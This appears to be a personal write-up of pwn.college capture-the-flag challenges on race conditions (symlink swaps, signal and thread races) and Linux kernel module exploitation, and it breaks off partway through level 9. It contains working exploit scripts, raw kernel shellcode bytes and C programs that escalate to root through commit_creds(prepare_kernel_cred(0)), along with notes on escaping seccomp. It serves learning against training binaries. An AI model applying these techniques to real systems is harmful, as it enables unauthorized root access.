ln -s /home ./2/aa # I got this one wrong once.

mkdir -p ./3/aa
ln -s /flag ./3/aa/bb

ln -s /home/hacker/1 ./dir

Test:

`(for i in {1..1000};do /challenge/babyrace_level5.1 ./dir/aa/bb;done) | egrep 'Error|pwn' | sort | uniq -c`

Results:

    356 Error: directory not owned by root!
     44 Error: failed to get directory status!
    116 Error: failed to get file status!
    472 Error: file is a symlink!
      3 pwn.college{ojL-wiqjv9XYN-GR2XsuQ-yucpZ.QXwEDNsMTM1IzW}
or
   5218 Error: directory not owned by root!
    896 Error: failed to get directory status!
   1300 Error: failed to get file status!
   2422 Error: file is a symlink!
     19 pwn.college{ojL-wiqjv9XYN-GR2XsuQ-yucpZ.QXwEDNsMTM1IzW}

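The success rate tops out at 20/10000, i.e. 2‰… Off to watch the video to see whether there is anything better. This is black magic, and that is just inside a 4-core docker container; a real machine would have more processes, more CPU cores, and odd scheduling algorithms. Is that something I can study? On to the next level; the Dirty COW PoC also just brute-forces with a huge loop count.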

level6

Same as the previous level, except that lstat is used after dirname, so symlinks are not followed…

???????????????????????????????

First touch a file /home/hacker/a/home/b, which passes the name and symlink checks.
Then ln /home/hacker/a -> /, so the dirname of the original path refers to: /home/hacker/a/home
Finally ln /home/hacker/a/home/b -> /flag

Revised version:

First touch a file /home/hacker/1/a/home/b, which passes the name and symlink checks.
Then ln /home/hacker/2/a -> /, so the dirname of the original path refers to: /home/hacker/2(dir)/a/home
Finally ln /home/hacker/3(dir)/a/home/b -> /flag

#!/bin/bash

if [ $1 == 'init' ]
then
    cd
    mkdir -p a/home
    touch a/home/b
elif [ $1 == 2 ]
then
    cd
    mv a b
    ln -s / /home/hacker/a
elif [ $1 == 3 ]
then
    cd
    rm a ./b/home/b
    mv b a
    ln -s /flag /home/hacker/a/home/b
elif [ $1 == 'cls' ]
then
    rm -r a b 2>/dev/null
else
    echo 'invalid argument'
fi

python:

The unlink and symlink system calls complete in just 0.000035s.
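
A figure like that can be re-measured with a sketch along these lines. It works in a throwaway temporary directory rather than under /home/hacker, and the directory names simply mirror the 1/2/3 layout used in these notes; the measured time will differ per machine.

```python
import os
import tempfile
import time

def time_symlink_swaps(rounds=1000):
    """Repeatedly repoint a symlink with unlink + symlink.

    Returns (average seconds per swap, name of the final target).
    """
    with tempfile.TemporaryDirectory() as workdir:
        link = os.path.join(workdir, "dir")
        targets = [os.path.join(workdir, name) for name in ("1", "2", "3")]
        for target in targets:
            os.mkdir(target)
        os.symlink(targets[0], link)

        start = time.perf_counter()
        for i in range(rounds):
            os.unlink(link)
            os.symlink(targets[(i + 1) % 3], link)
        elapsed = time.perf_counter() - start

        final_name = os.path.basename(os.readlink(link))
    return elapsed / rounds, final_name

per_swap, final_name = time_symlink_swaps()
print(f"{per_swap:.6f}s per swap, link ends at ./{final_name}")
```

Note that between unlink and symlink the name does not exist at all, which may be one source of "failed to get ... status" style errors in the victim.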

import os,sys,time
from os import symlink, unlink
if len(sys.argv) > 1:
    if sys.argv[1] == 'rm':
        os.system('rm -r $(ls | egrep -v "*py")')
        exit()
    elif sys.argv[1] == 'init' :
        os.system('rm -r $(ls | egrep -v "*py")')
        os.system('./initpy')
        exit()

while True:
    time.sleep(0.0001)
    #now dir -> 1, need to be unlinked
    unlink('./dir')
    symlink('./2', './dir')

    #now change dir to 3
    unlink('./dir')
    symlink('./3', './dir')
    time.sleep(0.00003)
    
    #now restore context
    unlink('./dir')
    symlink('./1', './dir')

initpy:

#!/bin/bash
mkdir -p ./1/a/home
touch ./1/a/home/b

mkdir -p ./2
ln -s / ./2/a

mkdir -p ./3/a/home
ln -s /flag ./3/a/home/b

ln -s /home/hacker/1 ./dir

./dir/a/home/b

Test:

`(for i in {1..20000};do /challenge/babyrace_level6.1 ./dir/a/home/b;done) | egrep 'Error|pwn' | sort | uniq -c`

The success rate dropped to 20/20000, i.e. one in a thousand…

level7

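All protections on. I could not solve it, so I went to look at where the race point is in the .0 binary.

Did not get it. Oh, I saw a hint on Discord!!! Only then did I remember that the video mentions signals, and this binary has a signal handler too.

At first I thought that meant waiting ten minutes, then suddenly remembered there is a system call for sending signals to other processes.

And the timeout_handler in the program merely performs a logout. That makes the race point obvious: if the handler fires after the first privilege_level check has passed but before the == 1 comparison, execution falls through to win(). A single success is enough.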

    else if ( !strcmp(s1, "win_authed") )
    {
      if ( privilege_level )
      {
// right here --------------------------------------------------------
        if ( privilege_level == 1 )
          puts("Your privilege level is too low!");
        else
          win();
      }
      else
      {
        puts("You are not logged in!");
      }}

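There is the kill system call. ~~To know the pid argument it would be easier to launch with pwntools, though I do not know how slow Python's sendline is…~~ Never mind, not using it.

In short: start the challenge from the command line and, in an infinite loop, echo the two commands login and win_authed, i.e. login\nwin_authed\n.
Then, in another infinite loop on the command line, keep sending signal 14 (SIGALRM) to the pid with kill.

Very direct, and the success rate is very low as well: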

while true;do kill -s 14 465;done
(while true;do printf 'login\nwin_authed\n';done)|/challenge/babyrace_level7.1|grep 'pwn'
ps aux
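
The signal side of this can also be driven from Python with `os.kill`. The sketch below only demonstrates the call by sending SIGALRM to the current process and catching it; against the challenge the pid would be the challenge's pid instead, and no handler would be installed on the sender.

```python
import os
import signal
import time

received = []

def on_alarm(signum, frame):
    # Stand-in for the target's timeout handler: just record the signal.
    received.append(signum)

previous_handler = signal.signal(signal.SIGALRM, on_alarm)
try:
    # Same effect as `kill -s 14 <pid>` from the shell, aimed at ourselves.
    os.kill(os.getpid(), signal.SIGALRM)
    deadline = time.time() + 1.0
    while not received and time.time() < deadline:
        time.sleep(0.01)
finally:
    signal.signal(signal.SIGALRM, previous_handler)

print(received)
```

Looping `os.kill(target_pid, signal.SIGALRM)` inside one Python process avoids the fork+exec cost of spawning the kill command on every iteration.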

level8

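For debugging, use sudo gdb in practice mode, or launch the program without set-uid through pwntools.
- info thread + thread [num]
- The first thread to hit a breakpoint stops, and gdb switches to that thread.
ps auxH shows threads.
Took a quick look at Python's concurrent.futures:
- It is all below. The main piece is ProcessPoolExecutor; its argument is the upper bound on workers, and it can be pictured as a pool of processes to draw on as needed.

ELF Handling For TLS | some expert's article on TLS variables | a decent-looking tutorial
The links above explain how the program uses fs to locate thread-local variables.

Each thread has its own space, but privilege_level is global. Open several connections with pwntools and do the same as in the previous level.

Success rate: 2/10000 = 0.2‰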

import concurrent.futures
import pwn

pwn.context.update(encoding='latin')

process = pwn.process('/challenge/babyrace_level8.1')

def work(cmd):
    with pwn.remote('localhost', 1337) as remote:
        pwn.info(remote.recvline().decode())
        remote.send(f'{cmd} ' * 10000)
        pwn.info(remote.clean().decode())

with concurrent.futures.ProcessPoolExecutor(3) as pool:
    future = []
    future.append(pool.submit(work, 'login'))
    future.append(pool.submit(work, 'logout'))
    future.append(pool.submit(work, 'win_authed'))
    concurrent.futures.wait(future)

level9

Came across a new module, psutil.

When the send_redacted_flag command runs, it writes "REDACTED: " into the buffer, terminated with a null byte (11 bytes including the null byte). It then calls open and read to read the flag into the buffer, right after that null byte.

If we now use the receive_message command to print the string containing the flag, output stops at the 11th position, because the n argument of write() comes from strlen() evaluated on the string in global_message.

So the procedure is as follows:

In one thread (connection), first send the send_redacted_flag command.
Between this and the next command, another thread sends the send_message command, overwriting global_message up to its 11th character; the race has to land before the terminating null byte is written.
The first thread then continues with the receive_message command. strlen() now returns 11 + [flag length], which is passed as the length argument of write().
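
The effect of the overwritten terminator can be reproduced in a single-threaded model. This is a simplified illustration: the buffer size, the placeholder flag, and the `c_strlen` helper are invented, and the real race depends on thread timing that is not modelled here.

```python
def c_strlen(buf):
    """Length up to (not including) the first null byte, like C strlen()."""
    return buf.index(0)

PREFIX = b"REDACTED: "                 # 10 characters, followed by a null byte
FAKE_FLAG = b"pwn.college{placeholder}"  # invented placeholder, not a real flag

global_message = bytearray(64)
global_message[:len(PREFIX)] = PREFIX                    # bytes 0..9
global_message[11:11 + len(FAKE_FLAG)] = FAKE_FLAG       # flag sits after the null byte

length_before = c_strlen(global_message)

# A racing send_message has copied 11 non-null bytes but has not yet
# written its own terminator.
global_message[:11] = b"A" * 11

length_after = c_strlen(global_message)
leaked = bytes(global_message[:length_after])
print(length_before, length_after, leaked)
```

Once the single null byte between the prefix and the flag is gone, strlen() runs on into the flag, and write() sends it along with the message.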

How to write the script…

Two connections: one sends the send_redacted_flag -> receive_message sequence, the other sends send_message with 'whatthefuckisthat' continuously (or space-separated in one very long byte string).

import concurrent.futures
import pwn

process = pwn.process('./babyrace_level9.1')

def work(cmd):
    with pwn.remote('localhost', 1337) as remote:
        pwn.info(remote.recvline().decode())
        remote.send(f'{cmd} ' * 10000)
        pwn.info(remote.clean().decode())

with concurrent.futures.ProcessPoolExecutor(3) as pool:
    thread = []
    thread.append(pool.submit(work, 'send_redacted_flag receive_message'))
    thread.append(pool.submit(work, 'send_message whatthefuck'))
    concurrent.futures.wait(thread)

Something interesting happened…

9999     Message: 
   1 [*] Message: 
   1     Message: REDAChED: \isthatandthis\at the fuck? this is true flag}
   1     Message: REDAChefuckisthatandthis\at the fuck? this is true flag}
 504     Message: REDACTED: [*] Function (send_message/send_redacted_flag/receive_message/quit): 
5444     Message: REDACTED: \isthatandthis\at the fuck? this is true flag}
   1     Message: REDACTefu \isthatandthis\at the fuck? this is true flag}
   1     Message: whatCTEfuckisthatandthis\at the fuck? this is true flag}
   1     Message: whattheD: \isthatandthis\at the fuck? this is true flag}
   1     Message: whatthef: \isthatandthis\at the fuck? this is true flag}
  18     Message: whatthefuc[*] Function (send_message/send_redacted_flag/receive_message/quit): 
   1     Message: whatthefuc\isthatandthis\at the fuck? this is true flag}
4027     Message: whatthefuckisthatandthis\at the fuck? this is true flag}

   1     Message: whatthefuckisn.ctalege{what the fuck? this is true flag}

After patching the program, something strange happened… How does line 11 occur? Can the write syscall be interrupted and then re-entered?

anyway, that’s the way it is.

level10

global_message with semaphore: sem_wait() + sem_post()……………

Stuck again… This kind of problem really takes counterintuitive thinking. I scp'd the .0 binary hoping to spot a hint. Found nothing.

level11

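I cannot see any difference from the previous level. I did pick up something on Discord, though:

10, 11 have semaphores on broadcast, 11 has a printf instead of strlen-read

Everyone on Discord uses SIGPIPE, which leads to a pthread_exit() call.

The .0 binary pauses on every iteration of the loop that copies the message. At that point, SIGPIPE can be sent to end the thread outright, so sem_post never runs and global_message_mutex is never released, meaning no thread can enter the critical section again.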
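
The "semaphore is never posted" consequence can be seen in a small model using Python's `threading.Semaphore` in place of sem_wait()/sem_post(). The worker simply returns without releasing, standing in for a thread that is ended between the two calls; names are made up.

```python
import threading

message_sem = threading.Semaphore(1)   # plays the role of global_message_mutex

def dying_worker():
    message_sem.acquire()              # sem_wait()
    # The thread ends here without message_sem.release(), standing in for
    # a thread terminated before it reaches sem_post().

worker = threading.Thread(target=dying_worker)
worker.start()
worker.join()

# Any later thread that wants the critical section now blocks; use a timeout
# so this sketch terminates instead of hanging.
later_thread_got_in = message_sem.acquire(timeout=0.2)
print(later_thread_got_in)
```

Whatever state the dying thread left in the shared buffer therefore stays as it is for every code path that needs the semaphore.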

Or not consuming input so the writes to the socket block at the right time

Not sure whether this works. It can only stop inside send_message.

The process is as follows:

One connection sends the send_redacted_flag command and lets the string copy complete.
Another connection (or the same one) sends the send_message command with whatthefuckisthis, overwriting the null byte between the prompt and the flag. After the null byte has been overwritten but before the last byte is written, send SIGPIPE to stop the thread.
Another connection sends receive_message.
Each run of the program allows only one attempt.

Succeeded on the .0 practice binary.

module D-kernel

key point:

Intro:

linux syscall DETAILS (linux inside) | linux_kernel_doc | syscall instruction | Attributes of Variables(gcc) |
- you cannot find noderef or address_space in the GCC docs because they are not GCC attributes. They have meaning only for Sparse.
  about the effect.
Modern solution to Rings: Ring -1, Hypervisor Mode. Able to intercept sensitive Ring 0 actions done by guests and handle them in the host OS.
syscall High-level overview:
1. At bootup, in Ring 0, the kernel sets MSR_LSTAR to point to the syscall handler routine.
2. When a userspace (Ring 3) process wants to interact with the kernel, it can call syscall.
  a. Privilege level switches to Ring 0.
  b. Control flow jumps to value of MSR_LSTAR.
  c. Return address saved to rcx.
  d. That’s basically it! https://www.felixcloutier.com/x86/syscall
3. When the kernel is ready to return to userspace, it calls the appropriate return instruction (i.e., sysret for syscall).
  a. Privilege level switches to Ring 3.
  b. Control flow jumps to rcx.
  c. That’s basically it!
4. x86-64: rdi rsi rdx r10 r8 r9 -
  We can see the 6 args are stored in these registers. rcx is used to store syscall return address, so args skip rcx.
exploit directions:
- From the network: remotely triggered exploits (packets of death, etc). Rare!
- From userspace: vulnerabilities in syscall and ioctl handlers (i.e., launched from inside a sandbox!)
- From devices

kernel module

lsmod lists kernel modules, such as device drivers (graphics card), filesystems, networking functionality, and other stuff.
All have the .ko extension.

How to interact with kernel module for further exploitation?

Historically, kernel modules could add syscall entries. This is less used nowadays.
Interrupts. A module could register an interrupt handler to hook. int3 and int1 are one-byte interrupt instructions which may be useful.
Files.
- /dev: mostly traditional devices (i.e., /dev/dsp for audio)
- /proc: started out in System V Unix as information about running processes. Linux expanded it into a disastrous mess of kernel interfaces.
- /sys: non-process information interface with the kernel.
- A module can register a file in one of the above locations.
  Userspace code can open() and read that file to interact with the module!
  Or it can use ioctl() to set and query non-stream data (i.e., webcam resolution settings as opposed to the webcam video stream).

driver interaction:

reads data from userspace (using copy_from_user, a kernel API)
“does stuff” (open files, read files, interact with hardware, etc)
writes data to userspace (using copy_to_user)
returns to userspace

kernel module: kernel doc

compilation:
- kernel modules are all listed in the pwnkernel/src/
- at the end of build.sh there is a module build step. It runs make in the src directory, then copies the .ko files to the fs directory, which is mounted at /home/ctf.
- so before compiling, add an entry to the makefile for any newly added module.
commands: must be run as root, otherwise sh reports not found.
- insmod command: load kernel module. or through init_module system call.
- lsmod : list all modules.
- rmmod : remove module.
testing module:
- hello_log.ko: just print something to kernel ring buffer.
- hello_dev_char.ko: register a character device. may use head, dd(with option like: if=/dev/pwn-college-char of=/proc/self/fd/1 bs=128 count=1) , etc, to read from it.
- hello_ioctl: exposes a /dev device with ioctl interface
- hello_proc_char: exposes a /proc device
- make_root: exposes a /proc device with ioctl interface and an evil backdoor!

Privilege Escalation

SLIDE. in make_root.c.

Escape Seccomp

SLIDE

mainly disable TIF_SECCOMP bit. all in SLIDES.

struct task_struct {
    // LOTS of stuff, including
    const struct cred __rcu *cred;
    struct thread_info thread_info;
}
struct thread_info {
    unsigned long flags;	/* low level flags */
    u32 status;		/* thread synchronous flags */
};

Yan demonstrates how to use make_root.ko to escape seccomp and escalate privileges.

memory management

Linux uses a four-level page table:

Only the lower 48 bits are used in addressing. The upper 16 bits are used to denote kernel space, and the ARM architecture uses these bits as a tag for security purposes. android source | LLVM memory tagging |
Virtual Machine isolation: The extended page table.
MMU + TLB
other architectures are analogous in paging. Linux requires a hardware MMU (although certain forks do not).
The Old Way: Old Linuxes could access physical memory via /dev/mem as root.
The New Way: If you want to get at physical memory now, you must do it from the kernel. Physical memory is mapped contiguously in kernel’s virtual memory space for convenient access. Two macros, phys_to_virt() and virt_to_phys().
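
To make the 48-bit, four-level layout concrete, the sketch below splits a virtual address into its four 9-bit table indices and the 12-bit page offset, and checks whether the upper bits form a canonical address. It assumes x86-64 with 4 KiB pages and four-level paging; the field names follow common Linux terminology but the helpers are made up.

```python
def is_canonical(vaddr):
    """True when bits 63..47 are all equal (all 0 = user half, all 1 = kernel half)."""
    top = vaddr >> 47
    return top == 0 or top == 0x1FFFF

def split_vaddr(vaddr):
    """Split a 64-bit virtual address into four 9-bit indices and a 12-bit offset."""
    return {
        "pgd": (vaddr >> 39) & 0x1FF,
        "pud": (vaddr >> 30) & 0x1FF,
        "pmd": (vaddr >> 21) & 0x1FF,
        "pte": (vaddr >> 12) & 0x1FF,
        "offset": vaddr & 0xFFF,
    }

example = 0xFFFFFFFF81000000   # an address in the upper (kernel) half
print(is_canonical(example), split_vaddr(example))
print(is_canonical(0x0000800000000000))   # bit 47 set, upper bits clear
```

Four indices of 9 bits plus a 12-bit offset account for exactly 48 bits, which is why the remaining upper bits carry no translation information.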

Mitigations

SLIDES many links.

Stack canaries: leak the canary!
kASLR: leak the kernel base address!
Heap/stack regions NX: ROP!
May support Function Granular ASLR.
Supervisor Memory Protection:
- SMEP.
  Prevents kernel-space code from Executing userspace memory at all ever.
- SMAP.
  Prevents kernel-space from even Accessing userspace memory unless the AC flag in the RFLAGS register is set. Two ring0 instructions, stac and clac, manage this bit.
- Why separate these? in SLIDES.

kernel shellcode

you cant use syscalls in kernel. just use call instruction with symbol addresses in /proc/kallsyms
KASLR. If it is on, I need to find a vulnerability that leaks a kernel symbol address.
indirect calls.
seccomp escaping: notice gs segment register to figure out where the task struct is.
The kernel is WAY too complex to figure out offsets manually.
Best option:
1. Write a kernel module in C with the actions you want
  your shellcode to do.
2. Build it for the kernel you want to attack (e.g., using
  the vm build command in pwn.college).
3. Reverse-engineer it to see how these actions work in
  assembly.
4. Re-implement that assembly in your shellcode!
be careful with kernel code context! Try to have it act like a normal function and return when it’s done.

Env setup

build for old kernel 5.4: set up an environment

The first compile stops at thunk_64.o, due to a missing symbol table.
- revise linux-5.4/tools/objtool/elf.c line 380 -> link
then revise build.sh and take a vm snapshot.
then revise arch/x86/boot/compressed/pgtable_64.c to fix multiple definitions of __force_order. link
OK. total size is 4.3G. by du -sh pwnkernel

VM by qemu:

Requirements: a recent version of gdb, a kernel with debug symbols, and ASLR turned off (in ./launch there is an -append option for qemu; check its usage).
Because the kernel is started under qemu, it can be debugged with gdb through port 1234.

gdb linux-5.4/vmlinux + target remote :1234 (I added it to .gdbinit in pwnkernel/)
cat /proc/kallsyms shows all symbols in the kernel. Because kernel address space randomization is disabled, they will always be the same.
Only a limited number of commands work in the VM; see ls /bin for details. The shell is provided by busybox, so functionality is limited.
Use sh -l or su - ctf to load ~/.profile. It contains some convenient aliases.

further setup is here

tips:

the wget command in build.sh has been given the -c option (--continue), which means that it won't repeat the download when the file already exists in the same directory.
mkdir -p no error if existing.

online environment

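vm debug: I have no idea what happened……. it suddenly worked and then shut down…..
so dumb, nothing ever stops. I'll take a look at writing kernel shellcode later. no use. do I really have to do everything locally? not that that's impossible…….
it's just that I can't debug. no solution found yet.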

level1

.0 level calls printk() function to give some info in kernel ring buffer. Obviously, .1 level doesn’t.

tested in ipython:

import os
fd = os.open('/proc/pwncollege', os.O_RDWR)
os.write(fd, b'password')  # os.write() needs bytes in Python 3
os.read(fd, 60)

level2

unlike previous level, there is no device_read() function, rather printk(flag) exists in device_write with password check.

script is the same way.

level3

the kernel module defines a win() function which will elevate the calling process privilege.

once the check passes, the current process (i.e., ipython) runs as root. then use !cat /flag and everything is done.

even though the password is the one from the previous level, it still works……..

level4

hijack the kernel module by ioctl(). it is in python fcntl module. doc

in python fcntl.fcntl() is almost equal to fcntl.ioctl(), except that ioctl()'s arg argument can also accept a mutable buffer (both accept an int or bytes).

script:

import fcntl, os
fd = os.open('/proc/pwncollege', os.O_RDWR)
fcntl.ioctl(fd, 1337, b'ruysmamctudpofzh')
#then !cat /flag

level5

device_ioctl() calls __x86_indirect_thunk_rbx.

retpoline, __x86_indirect_thunk_rbx……what’re these?

here it is(here is retpoline and google's article). when debugging, I find that it merely jumps to the address held in the register (rbx). so many nested macros in kernel code…..

ATTENTION: The following piece of code in fact creates a function, and the kernel module calls it. Thus the module pushes a return address onto the stack, and returning from the THUNK function brings execution back to complete the rest of the cleanup.

GENERATE_THUNK(_ASM_BX)
↘
#define __EXPORT_THUNK(sym) _ASM_NOKPROBE(sym); EXPORT_SYMBOL(sym)
#define EXPORT_THUNK(reg) __EXPORT_THUNK(__x86_indirect_thunk_ ## reg)
#define GENERATE_THUNK(reg) THUNK reg ; EXPORT_THUNK(reg)
↘
.macro THUNK reg
	.section .text.__x86.indirect_thunk

ENTRY(__x86_indirect_thunk_\reg)
	CFI_STARTPROC
	JMP_NOSPEC %\reg	  #simply a jmp to shellcode. no change to the stack. 
						#we can directly use ret to come back to module code.
	CFI_ENDPROC
ENDPROC(__x86_indirect_thunk_\reg)
.endm

what value does rbx hold before the jmp rbx instruction executes? it is ioctl()'s arg argument.

by cat /proc/kallsyms | grep win command, the win()’s address can be easily found. ffffffffc0000c5d t win [challenge]

but in pwn.college….

let’s give up this mysterious environment.

Now I know why it would happen……
normal user that doesn’t have enough privilege will find all kernel symbols with address 0.
then what should i do in pwn.college? emmmmmm
maybe i need to grep in practice mode and come back.

script:

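#include <stddef.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/sendfile.h>
int main(){
    int fd = open("/proc/pwncollege", O_RDWR);
    //arg is win()'s address found in /proc/kallsyms; the module jumps to it
    ioctl(fd, 1337, 0xffffffffc0000c5d);
    //after privilege escalation
    int fd2 = open("/flag", O_RDONLY);
    sendfile(1, fd2, NULL, 60);
}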

I win.

level6

begin kernel shellcoding!

at the beginning of the module, it calls kmalloc() to allocate a chunk of virtually contiguous memory. the details of its arguments are yet to be checked.
when writing to /proc/pwncollege, device_write() in the kernel calls copy_from_user() to copy the shellcode from write()'s buffer argument into the shellcode variable, and then jumps to the shellcode address.
don't forget to restore the kernel's context after the shellcode returns.

The critical point of shellcoding in the kernel is that we can only call kernel functions. here i use prepare_kernel_cred() and commit_creds() to achieve privilege escalation.

two functions’ address:


$ cat /proc/kallsyms | grep -E 'prepare_kernel_cred|commit_cred'
ffffffff810892c0 T commit_creds                                   
ffffffff810895e0 T prepare_kernel_cred

then call commit_creds(prepare_kernel_cred(0))
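
A minimal Python sketch of the symbol lookup, assuming the line format shown in the grep output above (address, type, name, optional [module]). The helper name parse_kallsyms is hypothetical, and the sample text stands in for a live /proc/kallsyms; its last line is made up to illustrate the zeroed addresses an unprivileged user sees.

```python
def parse_kallsyms(text):
    """Map symbol name -> address for lines shaped like /proc/kallsyms."""
    symbols = {}
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 3:
            continue  # skip blank or malformed lines
        addr = int(fields[0], 16)
        if addr == 0:
            continue  # zeroed address: reader lacked the privilege to see it
        symbols[fields[2]] = addr
    return symbols

# First two lines are copied from the grep output above;
# the third is an invented example of a hidden (zeroed) symbol.
sample = """\
ffffffff810892c0 T commit_creds
ffffffff810895e0 T prepare_kernel_cred
0000000000000000 t win [challenge]
"""

syms = parse_kallsyms(sample)
print(hex(syms["commit_creds"]), hex(syms["prepare_kernel_cred"]))
```

Skipping zero addresses makes a missing privilege show up as a KeyError instead of a silent jump to address 0.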

disassembled code:

call    _copy_from_user ; PIC mode
mov     rbp, rax
mov     rax, cs:shellcode
call    __x86_indirect_thunk_rax ; PIC mode

mov     rax, rbx
pop     rbx
sub     rax, rbp
pop     rbp
retn

what would happen if device_write() returns non-zero? first try without restoring anything:

shellcode = '''
	xor edi, edi
	mov rbx, 0xffffffff810895e0
	call rbx
	mov rdi, rax
	mov rbx, 0xffffffff810892c0
	call rbx
	ret	//returns into device_write(), right after the call to the thunk
'''

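The ret instruction returns into device_write() right after the call to the thunk. the shellcode clobbers rbx without restoring it, which violates the calling convention: rbx is a callee-saved register, and device_write() reads it afterwards (mov rax, rbx) to compute its return value. it may crash the kernel. but in practice, it doesn't.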
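
As a cross-check, here is a small Python sketch that hand-encodes the same instructions with the standard library only. The helper names mov_rbx_imm32 and build_shellcode are hypothetical; the encodings are the usual x86-64 ones (48 c7 c3 id for mov rbx, imm32 with sign extension, ff d3 for call rbx), and the addresses are the two from the kallsyms output above.

```python
import struct

def mov_rbx_imm32(addr):
    """Encode `mov rbx, imm32`; the CPU sign-extends imm32 to 64 bits."""
    low = addr & 0xffffffff
    extended = (low | 0xffffffff00000000) if (low & 0x80000000) else low
    if extended != addr:
        raise ValueError("address is not a sign-extended 32-bit value")
    return b"\x48\xc7\xc3" + struct.pack("<I", low)

def build_shellcode(prepare_kernel_cred, commit_creds):
    return b"".join([
        b"\x31\xff",                         # xor edi, edi
        mov_rbx_imm32(prepare_kernel_cred),  # mov rbx, prepare_kernel_cred
        b"\xff\xd3",                         # call rbx
        b"\x48\x89\xc7",                     # mov rdi, rax
        mov_rbx_imm32(commit_creds),         # mov rbx, commit_creds
        b"\xff\xd3",                         # call rbx
        b"\xc3",                             # ret
    ])

sc = build_shellcode(0xffffffff810895e0, 0xffffffff810892c0)
print(len(sc), sc.hex())
```

The short imm32 form only works because kernel text addresses have all upper 33 bits set; any other address would need the 10-byte movabs encoding instead.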

script:

#include <stddef.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/sendfile.h>
//generated with pwnsh
char *shellcode="\x31\xff\x48\xc7\xc3\xe0\x95\x08\x81\xff\xd3\x48\x89\xc7\x48\xc7\xc3\xc0\x92\x08\x81\xff\xd3\xc3";
int main(){
    int fd = open("/proc/pwncollege", O_RDWR);
    //a length of 0x1000 reads past the 24-byte literal; it worked here (see the log below)
    write(fd, shellcode, 0x1000);
    int fd2 = open("/flag", O_RDONLY);
    sendfile(1, fd2, NULL, 60);
}

win again.

~ $ ./test                                                                                                        
[ 2166.732101] [device_open] inode=ffff888006e33448, file=ffff888006bf7900                                        
[ 2166.737393] [device_write] file=ffff888006bf7900, buffer=0000000000481004, length=4096, offset=ffffc900001a7f08
pwn_college{what the fuck?}                                                                                       
[ 2166.748112] [device_release] inode=ffff888006e33448, file=ffff888006bf7900

level7

execute shellcode through ioctl

after checking the code for a while, I found that it may need to define a struct to wrap up the arg for ioctl().

__int64 __fastcall device_ioctl(file *file, unsigned int cmd, char *arg)
{
  __int64 result; // rax
  size_t shellcode_length; // [rsp+0h] [rbp-28h] BYREF
  void (*shellcode_execute_addr)(void); // [rsp+8h] [rbp-20h] BYREF
  unsigned __int64 v7; // [rsp+10h] [rbp-18h]

  v7 = __readgsqword(0x28u); //for canary
  printk(&unk_A30, file, cmd); //nothing
  result = -1LL;
  if ( cmd == 1337 ) //request number must be 1337
  {
    copy_from_user(&shellcode_length, arg, 8LL);
    copy_from_user(&shellcode_execute_addr, arg + 4104, 8LL);
    //shellcode_length is read from arg+0 and the execute address from arg+4104.
    //the shellcode itself starts at arg+8 and may be at most 0x1000 (4096) bytes.
    result = -2LL;
    if ( shellcode_length <= 0x1000 )
    {
      copy_from_user(shellcode, arg + 8, shellcode_length);	//copy shellcode.On success will return 0
      _x86_indirect_thunk_rax(shellcode_execute_addr);// jumpto shellcode.
      result = 0LL;
    }
  }
  return result;
}

the struct may be like:

struct anonym{
    long len;        //e.g. 200, must be <= 0x1000
    char a[4096];    //shellcode, starts at offset 8
    void* addr;      //at offset 4104, value = ?
}test;
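
The offsets that device_ioctl() reads (length at arg, shellcode at arg + 8, execute address at arg + 4104) can also be sketched as a packed buffer in Python. This is only an illustration: build_ioctl_arg is a hypothetical helper, and the address passed in is a placeholder that differs per environment.

```python
import struct

SHELLCODE_MAX = 0x1000  # device_ioctl() rejects anything longer
ADDR_OFFSET = 4104      # copy_from_user(&shellcode_execute_addr, arg + 4104, 8)

def build_ioctl_arg(shellcode, execute_addr):
    if len(shellcode) > SHELLCODE_MAX:
        raise ValueError("shellcode too long")
    # "<" means little-endian with no padding:
    # 8-byte length, 4096-byte zero-padded buffer, 8-byte pointer.
    return struct.pack("<Q4096sQ", len(shellcode), shellcode, execute_addr)

# Placeholder values: a lone `ret` and an example kernel address.
arg = build_ioctl_arg(b"\xc3", 0xffffc90000045000)
print(len(arg), hex(struct.unpack_from("<Q", arg, ADDR_OFFSET)[0]))
```

With an 8-byte length field in front, the buffer has to be 4096 bytes for the pointer to land at offset 4104.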

code near jmp:

mov     rdi, cs:shellcode
lea     rsi, [arg+8]
call    _copy_from_user ; PIC mode
mov     rax, [rsp+28h+shellcode_execute_addr]
call    __x86_indirect_thunk_rax ; PIC mode
xor     eax, eax

~~so i can reuse the rdi as the shellcode address.~~. emmmmm, use gdb.

~ $ cat /proc/kallsyms | grep 'device_ioctl'
0xffffffffc000092c t device_ioctl [challenge]

and the kmalloc() address……

► 0xffffffffc00009ac    call   _copy_from_user            <_copy_from_user>
       rdi: 0xffffc90000045000 ◂— 0xffffffffffffffff                       
       rsi: 0x4ae388 ◂— 0                                                  
       rdx: 0x0

the shellcode is the same as in the previous level.

script:

#include <stddef.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/sendfile.h>
#include <string.h>
char *shellcode="\x31\xff\x48\xc7\xc3\xe0\x95\x08\x81\xff\xd3\x48\x89\xc7\x48\xc7\xc3\xc0\x92\x08\x81\xff\xd3\xc3\x00";
int shellcode_len = 25;
struct anonym{
    long len;
    char a[4096];
    void* addr /* =? */;
}test;

int main(){
    test.len= shellcode_len;
    test.addr = (void*)0xffffc9000002f000;
    memcpy(test.a, shellcode, shellcode_len);
    int fd = open("/proc/pwncollege", 2);
    ioctl(fd, 1337, &test);
    //after privilege escalation
    int fd2 = open("/flag", O_RDONLY);
    sendfile(1, fd2, NULL, 60);
}

still win. but through a stupid way to find kmalloc()’s fixed address…..

level8

this challenge has two files. One for kernel module, the other for user land program to receive shellcode and add seccomp rules to itself(only write syscall is allowed).

nothing special.

level9

something strange in IDA…

Okay, it was just a misdecompilation of memset(v8, 0, 66). in machine code it is rep stosd with rcx=66, rdi=dest, eax=content. and the struct name needs to be modified in the Structures window.

we should fill with this structure, and overwrite the function pointer:

00000000 logggg          struc ; (sizeof=0x108, align=0x8, copyof_570)
00000000                                         ; XREF: device_write/r
00000000 buffer          db 256 dup(?)
00000100 log_function    dq ?                    ; XREF: device_write+4A/w
00000100                                         ; device_write:loc_661/r ; offset
00000108 logggg          ends
00000108

256 bytes shellcode and 8 bytes shellcode begin address.

ATTENTION:
call    __x86_indirect_thunk_rax ; PIC mode
this is a call instruction, so there is no need to fix up the stack context in the shellcode. Simply adding ret at the end of it is enough.

this module has local variable space on stack(and canary), so we can use the rdi to restore the stack context and make ret work normally.

//shellcode is also the same.
#include <stddef.h>
#include <fcntl.h>
